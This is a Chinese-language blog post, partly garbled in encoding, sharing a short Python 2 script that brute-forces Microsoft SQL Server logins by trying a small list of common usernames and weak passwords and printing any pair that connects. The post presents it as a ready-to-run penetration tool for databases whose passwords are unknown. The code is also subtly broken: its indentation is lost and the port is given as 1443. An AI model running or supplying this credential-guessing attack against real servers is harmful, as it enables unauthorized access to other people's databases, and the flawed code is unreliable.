Python版Mssql爆破小腳本
更新時間:2016年10月16日 20:23:00 投稿:hebedich
本文給大家分享的是使用Python實現(xiàn)的暴力破解mssql用戶密碼的腳本的代碼,配合上合適的字典非常好用,有需要的小伙伴可以參考下
Mssql Python版本爆破小腳本,需要安裝 MSSQL-python.exe 可以看出代碼量很少,用法:保存代碼為MssqlDatabaseBlasting.py,cmd切換到 MssqlDatabaseBlasting.py路徑下,并 執(zhí)行 MssqlDatabaseBlasting.py即可開始破解
import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密碼字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#賬號字典
success = False
host = "127.0.0.1"#數(shù)據(jù)庫IP地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try:
db = pymssql.connect(server=host, port=port, user=username, password=password)
success = True
if success:
print username, password
except Exception, e:
pass
說明:看到很多網(wǎng)絡(luò)安全愛好者,在進行滲透測試的時候,遇到數(shù)據(jù)庫可以遠程管理,但是無法破解其賬號密碼,所以此篇文章就推送幾個腳本進行滲透。
相關(guān)文章
MSSQLSERVER不同版本設(shè)置開啟遠程連接(sa配置)
這篇文章主要為大家詳細介紹了MSSQLSERVER不同版本設(shè)置開啟遠程連接,包括SQL SERVER 2008/2012/2012R2/2014開啟遠程連接的設(shè)置方法,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-03-03
SQL Server 批量插入數(shù)據(jù)的完美解決方案
這篇文章主要介紹了SQL Server 批量插入數(shù)據(jù)的完美解決方案,需要的朋友可以參考下2020-12-12

